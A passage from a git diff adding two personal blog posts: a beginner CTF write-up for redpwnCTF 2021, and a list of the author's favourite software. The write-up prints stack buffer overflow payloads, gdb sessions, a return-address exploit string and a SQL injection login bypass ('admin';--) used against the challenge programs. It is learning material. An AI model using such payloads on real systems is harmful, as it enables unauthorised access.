+not that great for binary exploitation, so the code for this is a little bit
+ugly, but if it works, it works!
+
+```
+(gdb) run < <(python3 -c "import sys; sys.stdout.buffer.write(b'a' * 40 + b'\xff' * 8)")
+(gdb) x/1gx $rbp - 0x8
+0x7fffffffd758: 0xffffffffffffffff
+```
+
+Now let's let execution continue as normal by using the `continue` command:
+
+```
+(gdb) continue
+Continuing.
+[Detaching after vfork from child process 22950]
+[Inferior 1 (process 22947) exited normally]
+```
+
+This might seem underwhelming, but our explit works! A child process was
+spawned, and as a bonus, we didn't get any segmentation faults! The reason we
+don't get an interactive shell is because we used python to pipe input into the
+program which makes it non-interactive.
+
+At this point I was about 12 hours in of straight gdb hell, and I was very
+happy to see this shell. After discovering this, I immediately tried it outside
+the debugger and was dissapointed to see that my exploit didn't work. After a
+small panick attack I found out this was because of my environment variables.
+You can launch an environment-less shell by using the `env -i sh` command:
+
+```
+λ generic → λ git master* → env -i sh
+sh-5.1$ python3 -c "import sys; sys.stdout.buffer.write(b'a' * 40 + b'\xff' * 8)" | ./beginner-generic-pwn-number-0
+"𝘭𝘦𝘵𝘴 𝘣𝘳𝘦𝘢𝘬 𝘵𝘩𝘦 𝘵𝘳𝘢𝘥𝘪𝘵𝘪𝘰𝘯 𝘰𝘧 𝘭𝘢𝘴𝘵 𝘮𝘪𝘯𝘶𝘵𝘦 𝘤𝘩𝘢𝘭𝘭 𝘸𝘳𝘪𝘵𝘪𝘯𝘨"
+rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self!
+can you write me a heartfelt message to cheer me up? :(
+sh-5.1$ # another shell :tada:
+```
+
+Now it was time to actually do the exploit on the remote server.
+
+I whipped up the most disgusting and janky python code that I won't go into
+detail about, but here's what is does (in short):
+
+1. Create a thread to capture data from the server and forward it to `stdout`
+2. Capture user commands using `input()` and decide what to do with them on the main thread
+
+The code for this script can be found
+[here](https://github.com/lonkaars/redpwn/blob/master/challenges/generic/pwn.py),
+though be warned, it's _very_ janky and you're probably better off copying
+stuff from stackoverflow. Writing your own tools is more fun though, and might
+also be faster than trying to wrestle with existing tools to try to get them to
+do exactly what you want them to do. In this case I could've also just used [a
+simple
+command](https://reverseengineering.stackexchange.com/questions/13928/managing-inputs-for-payload-injection?noredirect=1&lq=1).
+
+It did help me though and I actually had to copy it for use in the other buffer
+overflow challenge that I solved, so I'll probably refactor it someday for use
+in other CTFs.
+
+### crypto/round-the-bases
+
+This crypto challenge uses a text file with some hidden information. If you
+open up the file in a text editor, and adjust your window width, you'll
+eventually see the repeating pattern line up. This makes it very easy to see
+what part of the pattern is actually changing:
+
+```
+----------------------xxxx----
+[9km7D9mTfc:..Zt9mTZ_:K0o09mTN
+[9km7D9mTfc:..Zt9mTZ_:K0o09mTN
+[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN
+[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN
+[9km7D9mTfc:..Zt9mTZ_:K0o09mTN
+[9km7D9mTfc:..Zt9mTZ_:K0o09mTN
+[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN
+[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN
+[9km7D9mTfc:..Zt9mTZ_:K0o09mTN
+[9km7D9mTfc:..Zt9mTZ_:K0o09mTN
+[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN
+[9km7D9mTfc:..Zt9mTZ_:K0o09mTN
+[9km7D9mTfc:..Zt9mTZ_:K0o09mTN
+[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN
+[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN
+```
+
+I wrote a simple python script to parse this into binary data, and it worked on
+the first try:
+
+```py
+# read the file into a string
+file = open("./round-the-bases")
+content = file.read()
+file.close()
+
+# split on every 30th character into a list
+n = 30
+arr = [ content[i : i + n] for i in range(0, len(content), n) ]
+
+bin = []
+for line in arr:
+  sub = line[16:20] # the part that changes
+  if sub == 'IIcu': # IIcu -> 0x0
+    bin.append('0')
+  else: #             K0o0 -> 0x1
+    bin.append('1')
+
+bin = ''.join(bin) # join all the list indices together into a string
+
+# decode the binary string into ascii characters
+for i in range(0, len(bin), 8):
+  print(chr(int(bin[i:i+8], 2)), end='')
+
+# newline for good measure
+print("\n", end='')
+```
+
+### pwn/ret2generic-flag-reader
+
+This was the second binary exploitation challenge I tackled, and it went much
+better than the first because I (sort of) knew what I was doing by now.
+
+I figured the 'ret2' part of the title challenge was short for 'return to', and
+my suspicion was confirmed after looking at the c source:
+
+```c
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+
+void super_generic_flag_reading_function_please_ret_to_me()
+{
+  char flag[0x100] = {0};
+  FILE *fp = fopen("./flag.txt", "r");
+  if (!fp)
+  {
+    puts("no flag!! contact a member of rob inc");
+    exit(-1);
+  }
+  fgets(flag, 0xff, fp);
+  puts(flag);
+  fclose(fp);
+}
+
+int main(void)
+{
+  char comments_and_concerns[32];
+
+  setbuf(stdout, NULL);
+  setbuf(stdin, NULL);
+  setbuf(stderr, NULL);
+
+  puts("alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable...");
+  puts("how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function!");
+  puts("slap on some flavortext and there's no way rob will fire me now!");
+  puts("this is genius!! what do you think?");
+
+  gets(comments_and_concerns);
+}
+
+```
+
+With my newfound knowledge of binary exploitation, I figured I would have to
+overwrite the return pointer on the stack somehow, so the program calls the
+`super_generic_flag_reading_function_please_ret_to_me` function that isn't
+called at all in the original.
+
+The only input we have control over is again a call to `gets();`
+
+Let's look at the disassembly in gdb:
+
+```
+(gdb) disas main
+Dump of assembler code for function main:
+   0x00000000004013f4 <+79>:    call   0x4010a0 <puts@plt>
+   0x00000000004013f9 <+84>:    lea    rdi,[rip+0xca0]        # 0x4020a0
+   0x0000000000401400 <+91>:    call   0x4010a0 <puts@plt>
+   0x0000000000401405 <+96>:    lea    rdi,[rip+0xd0c]        # 0x402118
+   0x000000000040140c <+103>:   call   0x4010a0 <puts@plt>
+   0x0000000000401411 <+108>:   lea    rdi,[rip+0xd48]        # 0x402160
+   0x0000000000401418 <+115>:   call   0x4010a0 <puts@plt>
+   0x000000000040141d <+120>:   lea    rax,[rbp-0x20]
+   0x0000000000401421 <+124>:   mov    rdi,rax
+   0x0000000000401424 <+127>:   call   0x4010e0 <gets@plt>
+   0x0000000000401429 <+132>:   mov    eax,0x0
+   0x000000000040142e <+137>:   leave
+   0x000000000040142f <+138>:   ret
+End of assembler dump.
+```
+
+We see again multiple calls to `<puts@plt>` and right after a call to
+`<gets@plt>`. There is no `cmp` and `jne` to be found in this challenge though.
+
+The goal is to overwrite the _return address_. This is a memory address also
+stored in memory, and the program will move execution to that memory address
+once it sees a `ret` instruction. In this 'vanilla' state, the return address
+always goes to the assembly equivalent of an `exit()` function. Let's see if we
+can overwrite it by giving too much input:
+
+```
+(gdb) break *0x000000000040142f
+Breakpoint 1 at 0x40142f
+(gdb) run < <(python3 -c "print('a' * 56)")
+-- Breakpoint 1 hit --
+(gdb) info registers
+rax            0x0                 0x0
+rbx            0x401430            0x401430
+rsi            0x7ffff7f7d883      0x7ffff7f7d883
+rdi            0x7ffff7f804e0      0x7ffff7f804e0
+rbp            0x6161616161616161  0x6161616161616161
+rsp            0x7fffffffd898      0x7fffffffd898
+rip            0x40142f            0x40142f <main+138>
+```
+
+As you can see, the $rbp register is completely overwritten with `0x61`'s.
+Let's check the $rsp register to see where the `main()` function tries to go
+after `ret`:
+
+```
+(gdb) run
+Starting program: ret2generic-flag-reader
+alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable...
+how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function!
+slap on some flavortext and there's no way rob will fire me now!
+this is genius!! what do you think?
+a0a1a2a3a4a5a6a7a8a9b0b1b2b3b4b5b6b7b8b9c0c1c2c3
+-- Breakpoint 1 hit --
+(gdb) x/1gx $rsp
+0x7fffffffd898: 0x3363326331633063
+```
+
+Let's use CyberChef to see what `0x3363326331633063` is in ascii!
+
+![](/img/redpwn2021/cyberchef1.png)
+
+Hmm, it's backwards. Let's reverse it!
+
+![](/img/redpwn2021/cyberchef2.png)
+
+Let's find the address of the super generic flag reading function with gdb.
+
+```
+(gdb) print super_generic_flag_reading_function_please_ret_to_me
+$2 = {<text variable, no debug info>} 0x4011f6 <super_generic_flag_reading_function_please_ret_to_me>
+```
+
+Now we're ready to craft a string that exploits the program and runs the secret
+function!
+
+```
+a0a1a2a3a4a5a6a7a8a9b0b1b2b3b4b5b6b7b8b9c0c1c2c3 <- original
+                                        c0c1c2c3 <- ends up in $rsp
+aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa         <- padding ( 0x28 * 'a' )
+
+  c 0 c 1 c 2 c 3  <- ends up in $rsp
+  3 c 2 c 1 c 0 c  <- reverse
+0x3363326331633063 <- reverse (hex)
+0x00000000004011f6 <- pointer we want in $rsp
+  f611400000000000 <- reverse
+  \xf6\x11\x40\x00\x00\x00\x00\x00 <- python bytestring
+
+exploit string:
+b'a' * 0x28 + b'\xf6\x11\x40\x00\x00\x00\x00\x00'
+```
+
+Now let's try it in an environment-less shell:
+
+```
+python3 -c "import sys; sys.stdout.buffer.write(b'a' * 0x28 + b'\xf6\x11\x40\x00\x00\x00\x00\x00')" | ./ret2generic-flag-reader
+alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable...
+how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function!
+slap on some flavortext and there's no way rob will fire me now!
+this is genius!! what do you think?
+flag{this_is_a_dummy_flag_go_solve_it_yourself}
+
+Segmentation fault (core dumped)
+sh-5.1$
+```
+
+### rev/bread-making
+
+For this challenge, I first tried using iaito again to do some program flow
+analysis. After giving up on that, I decided to instead brute-force the correct
+steps by hand. This was a very long and boring process.
+
+First I used `strings` again to extract all the dialogue and user input strings
+from the binary. Then I filtered them to not include obvious dialogue, but only
+the possible user input strings. And this is the correct path that gives the
+flag:
+
+```
+add flour
+add salt
+add yeast
+add water
+hide the bowl inside a box
+wait 3 hours
+work in the basement
+preheat the toaster oven
+set a timer on your phone
+watch the bread bake
+pull the tray out with a towel
+open the window
+unplug the oven
+unplug the fire alarm
+wash the sink
+clean the counters
+flush the bread down the toilet
+get ready to sleep
+close the window
+replace the fire alarm
+brush teeth and go to bed
+```
+
+In hindsight I could've probably made a simple python script to brute force all
+remaining possibilities until it got longer output from the program, but
+laziness took over and I decided that spending 45 minutes doing very dull work
+was more worth it instead.
+
+## Willem's part in the CTF
+
+Hi, Willem here.
+
+In this part I will talk about my experience during the CTF and The
+collaboration between me and Loek.
+
+### web/orm-bad
+
+This was also my first CTF, just like Loek, because of this was quite uncertain
+about my skill level. For example, I have no experience using Linux systems,
+but from what I learned before the CTF it is quite essential. My fear of not
+being able to do any of the challenges disappeared quickly after we had
+completed the beginner challenges. With a simple sql injection I got my first
+real flag:
+
+```
+username: admin';--
+password:
+flag{this_is_a_dummy_flag_go_solve_it_yourself}
+```
+
+We had planned to use github's projects to track progress on challenges, but
+when you're actually doing a challenge it's the last thing you think about.
+So, we didn't really know who was doing which challenge, but because we're a
+team of two this wasn't a big problem.
+
+The most challenge were a bit to hard for me. Some I would get pretty far, but
+needed Loek's help to solve it. Others I didn't even attempt to begin on.
+
+### misc/the-substitution-game
+
+One challenge I spend a lot of time on was __The substitution game__. In the
+substitution game you had to substitute certain parts of the input string to
+get the desired output string. I got to level for of 6. Level 1 and 2 to were
+really simple, but at level 3 you started to need to really understand the
+game.
+
+```
+level 3:
+initial: aaaaaaaaaaaaaa (the amount of a's varied)
+target: a
+```
+
+The solution is really simple, but it's pretty hard to get to it. You want to
+remove 'a's so I started with `a => `, this turn all 'a's to None and left you
+with an empty string. The problem is you can't substitute anything in an empty
+string. The solution was `aa => a`, this removed an 'a' every time the initial
+string got checked. To get this solution you had to realize, that the program
+would always substitute the first instance it would come across, and the
+program was set to do way more than needed substitutions. This would come handy
+in the next level.
+
+```
+level 4:
+initial: ggggggggggg (the amount of g's varied)
+target: ginkoid
+```
+
+After completing level 3 this level looks very easy, just substitute the g's
+like before `gg => g` and turn the last g into ginkoid `g => ginkoid` , but
+this didn't work because of the way the program worked, after getting to a
+valid solution I didn't stop and the single g in ginkoid would also change to
+ginkoid. You would get infinite ginkoid. The solution was:
+
+```
+gg => ginkoid; ginkoidginkoid => ginkoid; ginkoidg => ginkoid
+```
+
+I began with noticing you couldn't just change the g, because that would also
+change the g in ginkoid. so double gg becomes ginkoid. We have to use the same
+trick as in level 3 to gain only one ginkoid `ginkoidginkoid => ginkoid`
+because of the way we changed the single g's to ginkoid it would only work with
+an even amount of g's. In the case there was an uneven amount of g's we would
+be left with ginkoidg, so we remove it `ginkoidg => ginkoid`.
+
+I found this challenge really enjoyable and during this challenge I noticed
+that I most enjoy the puzzle aspect of computer science, puzzling for hours to
+fix a bug and then finally finding a solution.
+
+I didn't complete many challenges and wasn't really able to help Loek, but I
+really enjoyed the CTF. It's a really fun way to test your skills and
+knowledge. In the end I'm really happy with the score we (mostly Loek) got and
+I think I’ll take part in other CTFs in the future.
+
+## Epilogue
+
+Of the 47 total challenges, me and Willem only solved 15. My end goal for this
+CTF wasn't winning to begin with, so the outcome didn't matter for me. After
+the second day I set the goal of reaching the 3rd page of the leaderboards as
+my goal, and we reached 277'th place in the end which made my mom very proud!
+
+![](/img/redpwn2021/leaderboard.png)
+
+I enjoyed the CTF a lot! There were some very frustrating challenges, and I
+still don't get how people solved web/wtjs, but that's fine. I did learn how to
+use GDB and a lot of other things during the CTF which were all very rewarding.
+I will definitely be participating in the 2022 redpwnCTF, and maybe even some
+others if they're beginner friendly :)
+
+During the Radboud CTF and this CTF I've accumulated a lot of ideas to maybe
+host one myself, though I have no clue where to start with that. Maybe keep an
+eye out for that ;)
+
diff --git a/_items/software.md b/_items/software.md
new file mode 100644
index 0000000..6aa1efc
--- /dev/null
+++ b/_items/software.md
@@ -0,0 +1,272 @@
+---
+title: software that I use
+tags: [software, open source, server, phone]
+---
+
+## PC software
+
+All of the software on this page is cool and I think you should try it. I also
+use all of this software, and will update this page when I find new, *even
+cooler* software to use instead. Most if not all of my configuration files
+(dotfiles) are on my [github](https://github.com/lonkaars/dotfiles). You can
+clone these and edit them to fit your needs, or you can use them as a reference
+for when you can't figure out how to configure something.
+
+### Regular software
+
+- **Email client**: [neomutt](https://neomutt.org/). It's fast and simple,
+  though configuring it was a pain in the ass. I'm currently using it in
+  combination with mbsync and imapnotify to get notifications for new emails,
+  and sync my mailbox for fast email viewing.
+
+- **Music player**: [mpd](https://www.musicpd.org/) with
+  [ncmpcpp](https://github.com/ncmpcpp/ncmpcpp). This is the best music setup
+  I've ever used. I download all my music in .flac format and mpd *just works*.
+  Since mpd has a server-client structure, I could also use this to set up
+  multiple devices that can add music to a central queue at a party or
+  something, but I just use it to launch [an fzf mpc
+  wrapper](https://github.com/DanielFGray/fzf-scripts/blob/master/fzmp) to
+  quickly add music while I'm doing something else.
+
+- **Text editor**: [nvim](https://neovim.io/). It's vim. If you don't like vim,
+  you should try using it longer. If you still don't like vim, you can use
+  [code oss](https://appimage.github.io/Code_OSS/) which is visual studio code
+  but without Microsoft's creepy telemetry features.
+
+- **PDF viewer**: [zathura](https://pwmt.org/projects/zathura/). It's a pdf
+  viewer with vim bindings, and it works with my TeX editing setup's live
+  reload thingy.
+
+- **Image viewer**: [sxiv](https://github.com/muennich/sxiv). It's like zathura
+  but for images, but it also does a bunch of other stuff that I don't use very
+  often.
+
+- **Browser**: [brave](https://brave.com/). It's a normie-friendly chromium
+  fork with extra privacy features! I of course use brave (or any
+  chromium-based browser) with [tampermonkey](https://www.tampermonkey.net/),
+  [ublock origin](https://ublockorigin.com/),
+  [stylus](https://github.com/openstyles/stylus) and [dark
+  reader](https://darkreader.org/).
+
+- **Terminal**: [st](https://st.suckless.org/). It's fast and simple, nothing
+  to complain about. I have my [own st fork](https://github.com/lonkaars/st),
+  with a bunch of patches that make me happy.
+
+- **Password manager**: [bitwarden](https://bitwarden.com/). Open source
+  password manager that you can host yourself. It also has public servers which
+  are mostly free, but some features like time-based one-time passwords are
+  paid. All the clients are also open source.
+
+- **Document typesetting**: [LaTeX](https://www.latex-project.org/) (using
+  [latexmk](https://personal.psu.edu/~jcc8/software/latexmk/) with the
+  [XeTeX](http://xetex.sourceforge.net/) compiler).
+
+- **File browser**: [ranger](https://github.com/ranger/ranger). It's kind of
+  slow, but I use the bulkrename feature very often, and I haven't gotten used
+  to the perl `rename` script yet.
+
+- [unar](https://github.com/MacPaw/XADMaster). I like running `unar [archive]`
+  instead of using `7z`, `tar`, `unzip`, etc. It creates a new folder to unpack
+  to automatically so it does exactly what I need.
+
+### OS stuff
+
+- **Window manager**: [i3-gaps](https://github.com/Airblader/i3). I tried it
+  once and didn't switch back so this is a winner I guess. I've also heard good
+  things about [dwm](https://dwm.suckless.org/), though I haven't used it
+  myself. Most people complain about i3's limited configurability, but I
+  haven't ran into something that it doesn't do for me.
+
+- **Application launcher**: [rofi](https://github.com/davatorium/rofi). I've
+  been using rofi since I started using linux, and haven't switched to anything
+  else because it's *very* configurable, and has a dmenu mode for using it
+  instead of dmenu with other scripts. I use it primarily as my application
+  launcher, but I also have a hotkey setup to launch `bwmenu` which is a script
+  that fills in bitwarden passwords using rofi.
+
+- **Shell**: [zsh](https://www.zsh.org/) with [oh-my-zsh](https://ohmyz.sh/).
+  It's zsh, all the cool kids use it already. I do have `/usr/bin/sh` `ln -s`'d
+  to `/usr/bin/bash`, but I'd like to change that to `/usr/bin/dash`. Eh, I'll
+  get around to it someday.
+
+- **Status Bar**: [polybar](https://github.com/polybar/polybar). Simple bar,
+  gets the job done, the configuration files make me go insane though. It took
+  me a good half year of ricing to understand the polybar configuration files,
+  and I'm still not sure if I do.
+
+- **Notification daemon**: [dunst](https://dunst-project.org/). I used to use
+  deadd-notification-center, but that has waaaay too many haskell dependencies
+  on arch, so I don't use that anymore.
+
+- **Global keybinds**:
+  [xbindkeys](https://www.nongnu.org/xbindkeys/xbindkeys.html). Simple
+  configuration, works flawlessly, 10/10.
+
+- **Compositor**: [picom](https://github.com/yshui/picom). It's a simple
+  compositor. I use it to enable vsync for desktop windows, and I have it set
+  up to only show a drop shadow on floating i3 windows.
+
+### Closed source
+
+- [discord](https://discord.com/). Gamer. The only reason this is listed here
+  is because I use discord with
+  [betterdiscord](https://github.com/rauenzi/BetterDiscordApp) (which *is*
+  open-source). Betterdiscord allows you to use custom css themes, custom
+  plugins and a whole bunch of other cool stuff that regular discord doesn't
+  do. It's technically against TOS, but I don't really care as I only use
+  quality of life improvement plugins.
+
+- [figma](https://figma.com). It's the designing software that I use to create
+  user interface or website mockups. It's easily accessible though a browser,
+  and it uses webassembly so it's also decently fast. It's free for personal
+  use.
+
+## Server software
+
+This is the software that runs on my home server.
+
+### Email
+
+I used [Luke Smith's](http://lukesmith.xyz/)
+[emailwiz](https://github.com/LukeSmithxyz/emailwiz) to set up my email server.
+The script installs and configures an email setup with
+[postfix](http://www.postfix.org/), [dovecot](https://www.dovecot.org/),
+[spamassassin](https://spamassassin.apache.org/) and
+[opendkim](http://www.opendkim.org/).
+
+### Etesync
+
+I run my own [etesync](https://www.etesync.com/) server for synchronizing my
+to-do lists, calendar and contacts. It's relatively easy to set up, and has a
+web interface that you can use with your own self-hosted instance.
+
+### Bitwarden
+
+I also run my own [bitwarden](https://github.com/bitwarden/server) server. It
+uses docker with docker-compose, which are two things that I'm supposed to know
+about, but I don't.
+
+I'm working on a connect 4 website myself, and I'm planning on learning to use
+docker with docker-compose to make it easier to run the seperate parts that are
+needed to host the project.
+
+### Git
+
+I have a [cgit](https://git.zx2c4.com/cgit/about/) server to host my git
+repositories on <https://git.pipeframe.xyz>, and I use
+[gitolite](https://gitolite.com/gitolite/) for ssh git push access. Cgit is
+very easy to set up, and I like it very much. Gitolite on the other hand is a
+pain in the ass to set up, because the documentation is not that great. If
+you're planning on using gitolite on your own server, set the umask in
+`~/.gitolite.rc` of your server's git account to `0022`.
+
+### SFTP
+
+I have two semi-public sftp accounts set up on my server: `media` and `sftp`.
+`sftp` is for generic file sharing, and `media` is for my media. Both accounts
+have tty login disabled and are chroot-jailed to /var/media and /var/sftp.
+
+## Phone apps
+
+These are the apps that I use on my phone. I recently upgraded my 2017 Nokia 6
+to a Google Pixel 4a (sunfish). It's a great phone! You can root it or flash
+custom rom's very easily, and it gave me new appreciation for the basic
+features of a smartphone. The Pixel 4a has really good haptics. They're almost
+iPhone level, though I won't be using iPhones any time soon.
+
+I flashed [CalyxOS](https://calyxos.org/) as soon as it was 5 minutes out of
+the box, but ended up not liking it because of it's nonexistant root support.
+I'm currently using [LineageOS](https://lineageos.org/) 18.1, rooted using
+[magisk](https://github.com/topjohnwu/Magisk).
+
+### Open source
+
+- **One-time password generator**: [andotp](https://github.com/andOTP/andOTP)
+
+- **App store**: [aurora store](https://gitlab.com/AuroraOSS/AuroraStore). This
+  app works better when you're rooted, but it's way better than the google play
+  store.
+
+- **App store**: [aurora f-droid](https://gitlab.com/AuroraOSS/auroradroid)
+
+- **Password manager**: [bitwarden](https://github.com/bitwarden/mobile)
+
+- **Browser**: [bromite](https://www.bromite.org/). This is basically ungoogled
+  chromium but for mobile.
+
+- **Calendar**: [etar](https://github.com/Etar-Group/Etar-Calendar)
+
+- [etesync](https://github.com/etesync/android)
+
+- **File browser**: [material
+  files](https://github.com/zhanghai/MaterialFiles). It looks sexy, it's free,
+  it's awesome.
+
+- **Email client**: [k-9](https://k9mail.app/).
+
+- **Maps**: [osmand](https://osmand.net/).
+
+- **Music player**: [shuttle](https://www.shuttlemusicplayer.com/). It looks
+  sexy, it's free, it's awesome.
+
+- **Instant messenger**: [signal](https://signal.org/).
+
+- **Manga reader**: [tachiyomi](https://tachiyomi.org/)
+
+- **To-do lists**: [tasks.org](https://tasks.org/). This is easily the best
+	to-do app I've ever used, and it integrated very well with etesync.
+
+	If you're cheap (like me), you can get 'free' pro by downloading this app
+	through f-droid instead of the play store. It's still nice to donate.
+
+- **Smart home control**: [home assistant](https://www.home-assistant.io/).
+	[the whole spiel](/post/homeauto).
+
+- **Notes**: [leaflet](https://github.com/PotatoProject/Leaflet). It's
+	basically Google Keep but open source and without Google. It's part of the
+	PotatoProject which is a custom Android rom, and there were plans for an open
+	source notes sync server that you could host yourself, but I haven't seen
+	that pop up yet.
+
+	The app is written in Flutter, and did have choppy scrolling animations on my
+	old phone. I'm not sure if that was a bug or my old phone just being
+	underpowered, but it's something I want to mention anyways.
+
+- **Weather**: [geometric
+	weather](https://f-droid.org/en/packages/wangdaye.com.geometricweather/).
+	It's really good. Good animations, live wallpaper, fast, etc.
+
+- **RSS Reader**: [tiny tiny
+	rss](https://www.f-droid.org/en/packages/org.fox.tttrss/). This app requires
+	that you host your own tiny tiny rss server, but I do and the app works
+	great!
+
+- **Myanimelist client**: [moelist](https://github.com/axiel7/MoeList). I don't
+	know how I found this app but it's a real gem. If you use MAL you should
+	download this app.
+
+- **PDF reader**: [pdf viewer
+	plus](https://f-droid.org/en/packages/com.gsnathan.pdfviewer/). This is the
+	only one that's actually decent. Good UI, good UX, pretty fast rendering.
+	9/10
+
+### Requires root
+
+- **Ad-blocker**: [adaway](https://adaway.org/). It does have a rootless mode,
+	though the app warns you that it's slower and impacts your battery life
+	negatively.
+
+- **Theme engine**: [substratum](https://github.com/substratum/substratum).
+	Substratum requires root on android 9+, unless you're on stock samsung (one
+	ui). Android 8 and under users can buy
+	[andromeda](https://play.google.com/store/apps/details?id=projekt.andromeda).
+	Samsung users can buy
+	[synergy](https://play.google.com/store/apps/details?id=projekt.samsung.theme.compiler).
+	They're both developed by the same people behind substratum, but they're not
+	open source.
+
+### Closed source
+
+- **Reddit client**:
+  [sync](https://play.google.com/store/apps/details?id=com.laurencedawson.reddit_sync)
+